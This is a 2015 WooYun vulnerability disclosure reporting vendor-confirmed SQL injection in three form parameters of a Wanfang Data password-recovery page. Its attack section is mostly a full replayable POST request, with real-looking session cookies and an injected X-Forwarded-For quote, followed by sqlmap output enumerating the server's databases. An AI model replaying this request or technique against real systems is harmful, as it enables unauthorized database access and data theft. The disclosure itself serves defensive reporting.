当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118601

漏洞标题:万方数据某处SQL注入(同一处三个参数注入打包)

相关厂商:wanfangdata.com.cn

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-06-08 09:58

修复时间:2015-07-24 12:48

公开时间:2015-07-24 12:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-08: 细节已通知厂商并且等待厂商处理中
2015-06-09: 厂商已经确认,细节仅向厂商公开
2015-06-19: 细节向核心白帽子及相关领域专家公开
2015-06-29: 细节向普通白帽子公开
2015-07-09: 细节向实习白帽子公开
2015-07-24: 细节向公众公开

简要描述:

【HD】 以团队之名 以个人之荣耀 共建网络安全

详细说明:

POST数据包:

POST /FrmFindPwd.aspx HTTP/1.1
Host: huodong.wanfangdata.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://huodong.wanfangdata.com.cn/FrmFindPwd.aspx
Cookie: WFMed.Auth=%7b%22Context%22%3a%7b%22AccountIds%22%3a%5b%5d%2c%22Data%22%3a%5b%5d%2c%22SessionId%22%3a%22deea836c-58fc-44e0-89be-5b071966522b%22%2c%22Sign%22%3anull%7d%2c%22LastUpdate%22%3a%222015-06-06T04%3a26%3a46Z%22%2c%22TicketSign%22%3a%22vGnh1dp58KZuN7%2bj2xmEuA%3d%3d%22%7d; WFKS.Auth=%7b%22Context%22%3a%7b%22AccountIds%22%3a%5b%5d%2c%22Data%22%3a%5b%5d%2c%22SessionId%22%3a%22cb4245e7-43eb-4ce4-a4e0-f732b08c8456%22%2c%22Sign%22%3a%22hi+authserv%22%7d%2c%22LastUpdate%22%3a%222015-06-06T04%3a24%3a52Z%22%2c%22TicketSign%22%3a%22wVc44P%5c%2fwBwxxc47VfXIH8Q%3d%3d%22%7d; WFEdu.Auth=%7b%22Context%22%3a%7b%22AccountIds%22%3a%5b%22EduPerson.fzjy%22%2c%22EduPublic.jg_fzsdjg%22%2c%22EduOrganization.jg_fzsdjg%22%2c%22EduGroup.jg_fzsdjg%22%2c%22EduBalanceLimit.jg_fzsdjg%22%2c%22Roaming.jg_fzsdjg%22%5d%2c%22Data%22%3a%5b%7b%22Key%22%3a%22EduPerson.fzjy.DisplayName%22%2c%22Value%22%3a%22%e6%9c%ba%e6%9e%84%e5%85%ac%e5%85%b1%e8%b4%a6%e5%8f%b7%22%7d%2c%7b%22Key%22%3a%22EduGroup.jg_fzsdjg.DisplayName%22%2c%22Value%22%3a%22%e7%a6%8f%e5%b7%9e%e5%b8%82%e7%94%b5%e6%95%99%e9%a6%86%22%7d%5d%2c%22SessionId%22%3a%224b8807c0-ddec-4fc5-8bf1-be008bbb73b2%22%2c%22Sign%22%3a%22FUNC%5c%2fbCeOp8LWqD5ISTtc3ki3F5GN4oEdcwSgqgeeF8LmxAj%2bawJVUufG%5c%2fv3aC31%22%7d%2c%22LastUpdate%22%3a%222015-06-06T04%3a27%3a21Z%22%2c%22TicketSign%22%3a%22vbHa2ypQESFNsTwkZoa2RQ%3d%3d%22%7d; Hm_lvt_f5e6bd27352a71a202024e821056162b=1433564611; Hm_lpvt_f5e6bd27352a71a202024e821056162b=1433564663
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 11621
__VIEWSTATE=%2FwEPDwUKMTg1ODE3NjM4Ng9kFgICAw9kFggCBw8QZBAVQw0tLeivt%2BmAieaLqS0tD%2BS6rOa0pemUgOWUruWMugnilJzljJfkuqwS4pSC4pSc5YyX5Lqs5aSn5a2mGOKUguKUnOWMl%2BS6rOeUteW9seWtpumZoiTilILilJzljJfkuqznlLXlrZDnp5HmioDogYzkuJrlrabpmaIk4pSC4pSc5YyX5Lqs5bel5Lia5aSn5a2m6IC%2F5Li55a2m6ZmiHuKUguKUnOWMl%2BS6rOiIquepuuiIquWkqeWkp%2BWtpjDilILilJzljJfkuqzoiKrnqbroiKrlpKnlpKflrabnu4%2FmtY7nrqHnkIblrabpmaIY4pSC4pSc5YyX5Lqs5YyW5bel5aSn5a2mGOKUguKUnOWMl%2BS6rOefv%2BS4muWkp%2BWtphjilILilJzljJfkuqznkIblt6XlpKflraYY4pSC4pSc5YyX5Lqs5p6X5Lia5aSn5a2mHuKUguKUnOWMl%2BS6rOWGnOS4muiBjOS4muWtpumZoiTilILilJzljJfkuqznpL7kvJrnrqHnkIbogYzkuJrlrabpmaIY4pSC4pSc5YyX5Lqs5biI6IyD5aSn5a2mJOKUguKUnOWMl%2BS6rOW4guacnemYs%2BWMuuiBjOW3peWkp%2BWtph7ilILilJzljJfkuqzkvZPogrLogYzkuJrlrabpmaIe4pSC4pSc5YyX5Lqs546w5Luj6IGM5Lia5a2m6ZmiJOKUguKUnOWMl%2BS6rOWuo%2Batpue6ouaXl%2BS4muS9meWkp%2BWtphjilILilJzljJfkuqzpgq7nlLXlpKflraYe4pSC4pSc5YyX5Lqs5pS%2F5rOV6IGM5Lia5a2m6ZmiG%2BKUguKUnOWMl%2BS6rOS4reWMu%2BiNr%2BWkp%2BWtphjilILilJzkuK3lpK7otKLnu4%2FlpKflraYY4pSC4pSc5YyX5Lqs5bel5ZWG5aSn5a2mGOKUguKUnOWbvemZheWFs%2Bezu%2BWtpumZohjilILilJzlm73lrrbms5XlrpjlrabpmaIY4pSC4pSc5Zu95a625byA5pS%2B5aSn5a2mGOKUguKUnOWbveWutuihjOaUv%2BWtpumZohXilILilJzmo4Dlr5%2FlrpjlrabpmaIS4pSC4pSc5riF5Y2O5aSn5a2mJOKUguKUnOmmlumDveW4iOiMg%2BWkp%2BWtpuenkeW%2Bt%2BWtpumZohXilILilJzpk4HpgZPpg6jlhZrmoKES4pSC4pSc5aSW5Lqk5a2m6ZmiGOKUguKUnOWMl%2BS6rOeJqei1hOWtpumZohjilILilJzljJfkuqzkv6Hmga%2FogYzpmaIk4pSC4pSc5Lit5Zu95Zyw6LSo5aSn5a2m77yI5YyX5Lqs77yJHuKUguKUnOS4reWbveWKs%2BWKqOWFs%2Bezu%2BWtpumZohjilILilJzkuK3lm73lhpzkuJrlpKflraYe4pSC4pSc5Lit5Zu95Lq65rCR5YWs5a6J5aSn5a2mGOKUguKUnOS4reWbveefs%2BayueWkp%2BWtphjilILilJzkuK3lm73mlL%2Fms5XlpKflraYY4pSC4pSc5Lit5Y2O5aWz5a2Q5a2m6ZmiHuKUguKUnOS4reeRnumFkuW6l%2BeuoeeQhuWtpumZohLilILilJzkuK3lpK7lhZrmoKEJ4pSc5aSp5rSlGOKUguKUnOays%2BWMl%2BW3peS4muWkp%2BWtphLilILilJzljZflvIDlpKflraYY4pSC4pSc5aSp5rSl6LSi57uP5aSn5a2mEuKUguKUnOWkqea0peWkp%2BWtphjilILilJzlpKnmtKXlt6XkuJrlpKflraYY4pSC4pSc5aSp5rSl56eR5oqA5aSn5a2mGOKUguKUnOWkqea0peeQhuW3peWkp%2BWtphjilILilJzlpKnmtKXllYbkuJrlpKflraYY4pSC4pSc5aSp5rSl5biI6IyD5aSn5a2mGOKUguKUnOWkqea0peW4guWbvuS5pummhhjilILilJzlpKnmtKXljLvnp5HlpKflraYb4pSC4pSc5aSp5rSl5Lit5Yy76I2v5aSn5a2mGOKUguKUnOS4reWbveawkeiIquWkp%2BWtphvilILilJzlpKnmtKXlpJblm73or63lrabpmaIV4pSC4pSc5aSp5rSl5Yac5a2m6ZmiHuKUguKUnOWkqea0peWfjuW4guW7uuiuvuWtpumZohjilILilJzlpKnmtKXogYzkuJrlpKflraYY4pSC4pSc5aSp5rSl5L2T6IKy5a2m6ZmiGOKUguKUnOWkqea0pee%2Bjuacr%2BWtpumZoh7ilILilJzlpKnmtKXlt6XnqIvluIjojIPlrabpmaIY4pSC4pSc5aSp5rSl6Z%2Bz5LmQ5a2m6ZmiFUMBMAMzNTIDNTY4AzU5NQM1OTYDNTk3AzU5OAM1OTkDNjAwAzYwMQM2MDIDNjAzAzYwNAM2MDUDNjA2AzYwNwM2MDgDNjA5AzYxMAM2MTEDNjEyAzYxMwM2MTQDNjE2AzY0MgM2NTkDNjYwAzY2MQM2NjIDNjg3AzcwNwM3MTkDNzUxAzc1NAM3NTYDNzYyAzc3OAM3NzkDNzgxAzc4MgM3ODMDNzg0Azc4NQM3ODYDNzg3AzU4MwM2NjgDNzAzAzc0MQM3NDIDNzQzAzc0NAM3NDUDNzQ2Azc0NwM3NDgDNzQ5Azc1MAM3ODADNzk4Azc5OQM4MDADODAxAzgwMgM4MDMDODA0AzgwNRQrA0NnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCCQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQhQYXJtTmFtZR4ORGF0YVZhbHVlRmllbGQFCVBhcm1WYWx1ZR4LXyFEYXRhQm91bmRnZBAVQBjljJfkuqznkIblt6XlpKflrabogIPnlJ8Y5YyX5Lqs55%2B%2F5Lia5aSn5a2m6ICD55SfGOS4reWbveefs%2BayueWkp%2BWtpuiAg%2BeUnxjljJfkuqzluIjojIPlpKflrabogIPnlJ8Y5YyX5Lqs5YyW5bel5aSn5a2m6ICD55SfEuWMl%2BS6rOWkp%2BWtpuiAg%2BeUnxjljJfkuqzkv6Hmga%2FogYzpmaLogIPnlJ8Y5YyX5Lqs6YKu55S15aSn5a2m6ICD55SfGOWMl%2BS6rOeJqei1hOWtpumZouiAg%2BeUnxjljJfkuqzlt6XllYblpKflrabogIPnlJ8Y5Lit5aSu6LSi57uP5aSn5a2m6ICD55SfEuS4reWkruWFmuagoeiAg%2BeUnx7kuK3lm73kurrmsJHlhazlronlpKflrabogIPnlJ8e5YyX5Lqs5pS%2F5rOV6IGM5Lia5a2m6Zmi6ICD55SfHuWMl%2BS6rOS9k%2BiCsuiBjOS4muWtpumZouiAg%2BeUnyTljJfkuqzluILmnJ3pmLPljLrogYzlt6XlpKflrabogIPnlJ8e5YyX5Lqs5Yac5Lia6IGM5Lia5a2m6Zmi6ICD55SfMOWMl%2BS6rOiIquepuuiIquWkqeWkp%2BWtpue7j%2Ba1jueuoeeQhuWtpumZouiAg%2BeUnyTkuK3lm73lnLDotKjlpKflrabvvIjljJfkuqzvvInogIPnlJ8Y5Zu95a626KGM5pS%2F5a2m6Zmi6ICD55SfJOWMl%2BS6rOekvuS8mueuoeeQhuiBjOS4muWtpumZouiAg%2BeUnxXpk4HpgZPpg6jlhZrmoKHogIPnlJ8Y5YyX5Lqs55S15b2x5a2m6Zmi6ICD55SfHuS4reWbveWKs%2BWKqOWFs%2Bezu%2BWtpumZouiAg%2BeUnyTljJfkuqznlLXlrZDnp5HmioDogYzkuJrlrabpmaLogIPnlJ8V5qOA5a%2Bf5a6Y5a2m6Zmi6ICD55SfEuWkluS6pOWtpumZouiAg%2BeUnx7ljJfkuqznjrDku6PogYzkuJrlrabpmaLogIPnlJ8b5YyX5Lqs5Lit5Yy76I2v5aSn5a2m6ICD55SfGOWbveWutuazleWumOWtpumZouiAg%2BeUnx7ljJfkuqzoiKrnqbroiKrlpKnlpKflrabogIPnlJ8Y5Lit5Zu95Yac5Lia5aSn5a2m6ICD55SfGOS4reWbveaUv%2BazleWkp%2BWtpuiAg%2BeUnxjljJfkuqzmnpfkuJrlpKflrabogIPnlJ8Y5Lit5Y2O5aWz5a2Q5a2m6Zmi6ICD55SfJOWMl%2BS6rOWuo%2Batpue6ouaXl%2BS4muS9meWkp%2BWtpuiAg%2BeUnxjlm73pmYXlhbPns7vlrabpmaLogIPnlJ8S5riF5Y2O5aSn5a2m6ICD55SfGOWbveWutuW8gOaUvuWkp%2BWtpuiAg%2BeUnx7kuK3nkZ7phZLlupfnrqHnkIblrabpmaLogIPnlJ8k5YyX5Lqs5bel5Lia5aSn5a2m6IC%2F5Li55a2m6Zmi6ICD55SfJOmmlumDveW4iOiMg%2BWkp%2BWtpuenkeW%2Bt%2BWtpumZouiAg%2BeUnxjlpKnmtKXluILlm77kuabppobogIPnlJ8S5aSp5rSl5aSn5a2m6ICD55SfEuWNl%2BW8gOWkp%2BWtpuiAg%2BeUnxjmsrPljJflt6XkuJrlpKflrabogIPnlJ8Y5aSp5rSl5bel5Lia5aSn5a2m6ICD55SfGOWkqea0peW4iOiMg%2BWkp%2BWtpuiAg%2BeUnxjlpKnmtKXnp5HmioDlpKflrabogIPnlJ8Y5aSp5rSl55CG5bel5aSn5a2m6ICD55SfGOWkqea0peWMu%2BenkeWkp%2BWtpuiAg%2BeUnxvlpKnmtKXkuK3ljLvoja%2FlpKflrabogIPnlJ8Y5Lit5Zu95rCR6Iiq5aSn5a2m6ICD55SfGOWkqea0peWVhuS4muWkp%2BWtpuiAg%2BeUnxjlpKnmtKXotKLnu4%2FlpKflrabogIPnlJ8b5aSp5rSl5aSW5Zu96K%2Bt5a2m6Zmi6ICD55SfFeWkqea0peWGnOWtpumZouiAg%2BeUnx7lpKnmtKXln47luILlu7rorr7lrabpmaLogIPnlJ8Y5aSp5rSl5L2T6IKy5a2m6Zmi6ICD55SfGOWkqea0peiBjOS4muWkp%2BWtpuiAg%2BeUnxjlpKnmtKXnvo7mnK%2FlrabpmaLogIPnlJ8e5aSp5rSl5bel56iL5biI6IyD5a2m6Zmi6ICD55SfGOWkqea0pemfs%2BS5kOWtpumZouiAg%2BeUnw0tLeivt%2BmAieaLqS0tFUAY5YyX5Lqs55CG5bel5aSn5a2m6ICD55SfGOWMl%2BS6rOefv%2BS4muWkp%2BWtpuiAg%2BeUnxjkuK3lm73nn7PmsrnlpKflrabogIPnlJ8Y5YyX5Lqs5biI6IyD5aSn5a2m6ICD55SfGOWMl%2BS6rOWMluW3peWkp%2BWtpuiAg%2BeUnxLljJfkuqzlpKflrabogIPnlJ8Y5YyX5Lqs5L%2Bh5oGv6IGM6Zmi6ICD55SfGOWMl%2BS6rOmCrueUteWkp%2BWtpuiAg%2BeUnxjljJfkuqznianotYTlrabpmaLogIPnlJ8Y5YyX5Lqs5bel5ZWG5aSn5a2m6ICD55SfGOS4reWkrui0oue7j%2BWkp%2BWtpuiAg%2BeUnxLkuK3lpK7lhZrmoKHogIPnlJ8e5Lit5Zu95Lq65rCR5YWs5a6J5aSn5a2m6ICD55SfHuWMl%2BS6rOaUv%2BazleiBjOS4muWtpumZouiAg%2BeUnx7ljJfkuqzkvZPogrLogYzkuJrlrabpmaLogIPnlJ8k5YyX5Lqs5biC5pyd6Ziz5Yy66IGM5bel5aSn5a2m6ICD55SfHuWMl%2BS6rOWGnOS4muiBjOS4muWtpumZouiAg%2BeUnzDljJfkuqzoiKrnqbroiKrlpKnlpKflrabnu4%2FmtY7nrqHnkIblrabpmaLogIPnlJ8k5Lit5Zu95Zyw6LSo5aSn5a2m77yI5YyX5Lqs77yJ6ICD55SfGOWbveWutuihjOaUv%2BWtpumZouiAg%2BeUnyTljJfkuqznpL7kvJrnrqHnkIbogYzkuJrlrabpmaLogIPnlJ8V6ZOB6YGT6YOo5YWa5qCh6ICD55SfGOWMl%2BS6rOeUteW9seWtpumZouiAg%2BeUnx7kuK3lm73lirPliqjlhbPns7vlrabpmaLogIPnlJ8k5YyX5Lqs55S15a2Q56eR5oqA6IGM5Lia5a2m6Zmi6ICD55SfFeajgOWvn%2BWumOWtpumZouiAg%2BeUnxLlpJbkuqTlrabpmaLogIPnlJ8e5YyX5Lqs546w5Luj6IGM5Lia5a2m6Zmi6ICD55SfG%2BWMl%2BS6rOS4reWMu%2BiNr%2BWkp%2BWtpuiAg%2BeUnxjlm73lrrbms5XlrpjlrabpmaLogIPnlJ8e5YyX5Lqs6Iiq56m66Iiq5aSp5aSn5a2m6ICD55SfGOS4reWbveWGnOS4muWkp%2BWtpuiAg%2BeUnxjkuK3lm73mlL%2Fms5XlpKflrabogIPnlJ8Y5YyX5Lqs5p6X5Lia5aSn5a2m6ICD55SfGOS4reWNjuWls%2BWtkOWtpumZouiAg%2BeUnyTljJfkuqzlrqPmrabnuqLml5fkuJrkvZnlpKflrabogIPnlJ8Y5Zu96ZmF5YWz57O75a2m6Zmi6ICD55SfEua4heWNjuWkp%2BWtpuiAg%2BeUnxjlm73lrrblvIDmlL7lpKflrabogIPnlJ8e5Lit55Ge6YWS5bqX566h55CG5a2m6Zmi6ICD55SfJOWMl%2BS6rOW3peS4muWkp%2BWtpuiAv%2BS4ueWtpumZouiAg%2BeUnyTpppbpg73luIjojIPlpKflrabnp5HlvrflrabpmaLogIPnlJ8Y5aSp5rSl5biC5Zu%2B5Lmm6aaG6ICD55SfEuWkqea0peWkp%2BWtpuiAg%2BeUnxLljZflvIDlpKflrabogIPnlJ8Y5rKz5YyX5bel5Lia5aSn5a2m6ICD55SfGOWkqea0peW3peS4muWkp%2BWtpuiAg%2BeUnxjlpKnmtKXluIjojIPlpKflrabogIPnlJ8Y5aSp5rSl56eR5oqA5aSn5a2m6ICD55SfGOWkqea0peeQhuW3peWkp%2BWtpuiAg%2BeUnxjlpKnmtKXljLvnp5HlpKflrabogIPnlJ8b5aSp5rSl5Lit5Yy76I2v5aSn5a2m6ICD55SfGOS4reWbveawkeiIquWkp%2BWtpuiAg%2BeUnxjlpKnmtKXllYbkuJrlpKflrabogIPnlJ8Y5aSp5rSl6LSi57uP5aSn5a2m6ICD55SfG%2BWkqea0peWkluWbveivreWtpumZouiAg%2BeUnxXlpKnmtKXlhpzlrabpmaLogIPnlJ8e5aSp5rSl5Z%2BO5biC5bu66K6%2B5a2m6Zmi6ICD55SfGOWkqea0peS9k%2BiCsuWtpumZouiAg%2BeUnxjlpKnmtKXogYzkuJrlpKflrabogIPnlJ8Y5aSp5rSl576O5pyv5a2m6Zmi6ICD55SfHuWkqea0peW3peeoi%2BW4iOiMg%2BWtpumZouiAg%2BeUnxjlpKnmtKXpn7PkuZDlrabpmaLogIPnlJ8BMBQrA0BnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCDg8QZGQWAWZkAg8PEA8WBh8ABQhQYXJtTmFtZR8BBQlQYXJtVmFsdWUfAmdkEBUBDS0t6K%2B36YCJ5oupLS0VAQAUKwMBZxYBZmRkPp3xguu8vhYczHg71xizYWDpeUglTkk216a%2F8z61nTg%3D&__EVENTVALIDATION=%2FwEdAI0BZZ3W%2Fjh9LqhTCjQsQ%2Fk5vbcNTgo7g%2BpuNqWiZ5ZxRPhjemWCTRgEB59HPczIGVNw6eNP8asIByKhl2QKKQZHZLkq9xltjxLc0k4tH6S0CBexmotP50PkZuF2YlhhUEqBG%2FqsxlU4rha2vr7BQqFsMLKpIp21cRRrw7vxaRLHh0dpquC7%2BRGfaHYjn%2FKVeB2CBXECZ6Cq5dr7NubdT54E1a%2B9IkTKW9SOznU%2FcIEV0q57ldzC2N1fibdSttv7gytibWU6bJ%2BeYk%2FDdzWHAbYDiYTVp8Aol3%2BnFktpxBU1KUtIxYsRHwOSbLTRnMOCJUn8MZpRVabjARlV5dr3vNWu8wFa5NtwNl8c%2BCBdKrGUALp3%2B70glndFuTxURTZDoZZVASAMyGonV10SUiHlxafO0upbHWez62DH5WTftDQ05OyExechL%2BTEO2BvwOev%2BmubGqO9jfwrrwNHIXu71WH4jxDNdwsaMtJuJUEKYS04S28mFjrqWn9YbCNNKlPd50wMv6sKlhNEsrQWrOHEAHpfE2Ujgi0Fb%2BJ4wd0hkdFI2V3%2BLEaMre2QCzmQq%2BCDVomNynIQLxGQv%2BggqVS6BNlejEWS%2FB9qoz8iaM1pSeqAbna4%2FKdHnBzBvejdNNEbykOZXkpafXWM5XFCNKG1EP7OaE58bCa7nh3n22BXoT7AHXdDXmGZhMoTbmEqfNuIbnhvMuo8vtxpCqlzAN%2F3bQPWk%2FU5rUjaPDvXP0wquLKLu6B0fOhyuoivyyJ9FspdZ6Qa0fD6WLJGBQ36f2PioizUO6hFbPFuCQ1NFosLGw7palcLI28aJQvwJhzcmKn32R3uzKSFc54IISGglPc7PkHWfveYR8f2QiIBu5hsuAt6OFLV05Li%2FwrED%2BmDTetc1VWsZ1ejvOXptC0AlvzA%2F%2BLPCULUFDx4VZEf4pi6%2F2IMcDOMqANl3%2BMhLeqYYNKzJgKqcopliAooH5Cd6KjtFPJJ98ufkneuV1cT9TjInh61WiNyLyJFTCIXdfIt1qJi0Uf3amVokW47PNuQxuKY3gHvlc4YYizV9X5OGy%2F4dfW%2BkA5C8itGwZFE101rAUPZpJcKSZWHrIwNW2pVYRgQVAoGhba7AkBfSU7wuoRKbkpMzDxGcOTL9ads2OwiMQu3jJ7tm4p4wUWYEAtYhP3Qa342c2TGVgQvCOf%2Fs5z0SoNeZsy%2BZZNviCjKfUe%2FWsnm%2BdHRbQDKEBvLB0PB5N6ggDZBG3PzxYF%2BPFJt5q3pVHOMEjhUa6cT2IHgCPSRT4XtTuKuzXry6NjYMdQnXlAgtd9XI5onvm8Ix0wsH1HTYxXRLKttJLqx2hCqBiKGmBp5erg%2BBQ2y9gIwEXofIhHY99iThFi7P8sECvdNv7RYqAYuOsQyJ1dewW817WiXd4BMvTfuNNGqxwD9arkztR4SeMZEprOvZyOJ15L6eXwwK6PRcKrOA2bZCsTmi33ev8WgEuKthcKBbSlfleYGgwAW%2FwpSmPH4PJQmowwzhIegkK1ve1CdZ5CmdB9znjlP0jqKuUVToZRLupsXxZWkH%2Fkf2bL7YhgVTxFUoiQIMetcKGS8pxeLUK3OIlwjxnMz%2FJ%2F5cbPSsHnuUHzoj7HU0XVC9AR%2BXx1tp4xmYxDa0LLPqXYpr%2BwK4hkmNfQGAX9Vz15B1H33Y1VftAQ%2BHOwlk8n3UBqSLklgYsF3kZowfTjU%2FwketFUs%2Bxj0xjLweGc4hDOmz320dfsJZxiuMXUtE%2Bv20u8GaYXHswserHXfuTnV3XEL4jsLUZbuTkEpvI87JCzvTQe%2BD776V%2FotFmpsVk1FP4JKdOWSmbzok%2F1fOef6ATNFFR%2FCzvdkID4E3fjSMt2see9cpdj4jRHAPnSEO6YjOSM2lseQymzM8X%2Bnt40mvcbCpQ1Mw%2F5rmT2duUTtGN%2BNoNv%2B8USOEE3LHF%2Fp8kBTJH8PNO0Krf%2FadZoqZRflkhSSNDdWLtgtuK8vW2IR5zCd%2B6kcQ4EIMYEsP0ljUDPCREXCCboqGDngAbpm%2FFYYvapoLzlGn27xn21mft7o%2BKrYqxUGuMDQjBGxmyN00o9PA4Xbgf%2BNyRuhBA24ZLOHYMLD7swL%2Bw6xWYmQoKEHAXlJCYrwwBbP%2Bq8WRldoCfbnBI5QRJNY2h6OMyXS2Jb%2BPd3n2%2BqrJ5v8vSCPKc5avwmM017nrdUHeML7znBM%2FDJT1hDL%2FqiB%2FchXymtfQlR5IStB46ifwMHh8GlnTlwiNACLE%2F1E6H5hyq6xqc99%2F2KMG9wWk5pHoOkZCgr6HKZ5QX8SpthPN7pdhNqrA2V7eUGILxijxpDMdu9D7cBWkM9blg3xeTDNRcJ0iYZfSvGyi754Eda%2BReZWnVpvI3u9pMPY9k2Tk7CGgmr36Wz%2B1d6GI1tQ%2Birt5oZ8RB77wFrRBth4VbdtRAkUBPGCYhpxH%2Fh3DbMoTOFXtlb%2FSyWt0s08otIYdpqC43B76bmdbz1dQYBu7sbMHtADMCg2NH5NGmqb1C%2BRrjjcJ3Vs5T%2FJwCr4uXxieZpEOnuNk60lfisKTFuw0OF0jInAgPbO2IBiq6GvBkkc75KPzIZbDSs8Muy75jagfIGIQSFrKDoLe8%2Fp1pyCMSV7FnJguJRFMiMXcaqOJIQld4w9lwiSxAcG92%2Fr3ZzLCsq8c%2FyP2i1U3I0PoqwNTl%2BGMyUJVp9OoMORSyifp4d%2FdmO3nmZX47L9ZXCuXMoOsYtfekUV10qmcYf0%2Fs5ADNTsdGEkcFkgXDNECnpRDLhp3NA%2BCBoKRAOdPX4iaN1MpCa9fj6A%2FzdsRvJLEPNYvN%2Br%2FOWZY7ZI9Fgxoxh%2BJu1a5VNsuVAvwB7qaDMl1Msxkt%2Bw0t8hHYsbIhlviBHnu0TP90KPqMhEfjW9uhwaaIqwNNqr%2BinmkuBqFkpWy0YjuIAbt%2B32poYkgN4kxEDprdDigdBDiWJmMN0pOcFAVilhfLQmm6vBdu4N3WWGGRf4dQ6YKkFOSKZtbDAAQZQEwfOFsLF6C2Fn%2FhUX9FLmg%2BaEw5mv%2BFRTQ8VK9l%2FG9EDD%2BmlIeoEd8%2FKGeZicRky%2B69M%3D&txtUserCode=2123123&txtUserName=wooyun&DDLUserSex=&DDLDept=352&DDLWorker=%E5%A4%A9%E6%B4%A5%E5%B7%A5%E4%B8%9A%E5%A4%A7%E5%AD%A6%E8%80%83%E7%94%9F&txtUserSFZH=&txtMoveTel=&butDefault=%E6%8F%90+%E4%BA%A4


txtMoveTel txtUserCode 以及 txtUserName 参数均未过滤

0.png


[12:42:37] [INFO] testing Microsoft SQL Server
[12:42:37] [INFO] confirming Microsoft SQL Server
[12:42:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[12:42:38] [INFO] fetching database names
[12:42:38] [INFO] the SQL query used returns 8 entries
[12:42:39] [INFO] retrieved: examv5W2
[12:42:39] [INFO] retrieved: master
[12:42:39] [INFO] retrieved: model
[12:42:39] [INFO] retrieved: msdb
[12:42:40] [INFO] retrieved: ReportServer
[12:42:40] [INFO] retrieved: ReportServerTempDB
[12:42:40] [INFO] retrieved: tempdb
[12:42:40] [INFO] retrieved: wf_cddb_irc
available databases [8]:
[*] examv5W2
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] wf_cddb_irc
[12:42:41] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 124 times
[12:42:41] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\huodong.wanfangdata.com.cn'


1.png


3.png


4.png


漏洞证明:

这里因为数据太多 而且是一个地方 如果只看 sqlmap 里会分不清是哪个参数 所以我这里用 burp 重放攻击 报错测试参数
参数 txtUserCode 报错

1.png


参数 txtUserName 报错

2.png


参数 txtMoveTel 报错

3.png


同一处地方 所以跑出的数据库都是一样的

修复方案:

过滤

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-06-09 08:00

厂商回复:

thanks

最新状态:

暂无